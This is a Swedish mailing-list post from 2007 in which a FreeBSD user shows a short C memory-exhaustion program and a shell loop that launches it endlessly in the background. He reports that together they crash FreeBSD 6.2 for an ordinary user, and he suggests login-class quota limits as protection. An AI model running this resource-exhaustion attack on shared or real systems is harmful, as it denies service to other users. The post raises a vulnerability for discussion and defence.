Denial of service attack.
G Hasse
gh at raditex.se
Thu Mar 29 01:24:43 CEST 2007
Hej!
Om man som vanlig användare gör programmet
---
#include <stdio.h>
#include <stdlib.h>
main()
{
char *pek;
while(1) {
pek = (char * ) malloc(10000);
}
}
---
bygger detta och sedan gör
---
while true
do
./a.out &
done
---
Så sänker man enkelt FreeBSD 6.2.
Visserligen är detta gammla kända problem i Unix - men borde
det inte räknas som en DOS attack?
Jag tycker att man *aldrig* som vanlig användare i ett default-system
ska kunna stänga av det.
Det är enkelt att skydda sig, t.ex. genom att ge användaren en klass
och begränsa qouta i /etc/login.conf. Men om root kan sänka maskinen
det är väl ok. Men inte en vanlig user...
--
Göran Hasse
----------------------------------------------------------------
Göran Hasse email: gh at raditex.se Tel: 08-6949270
Raditex AB http://www.raditex.se
Planiavägen 15, 1tr Mob: 070-5530148
131 34 NACKA, SWEDEN OrgNr: 556240-0589
VAT: SE556240058901
------------------------------------------------------------------
More information about the BUS
mailing list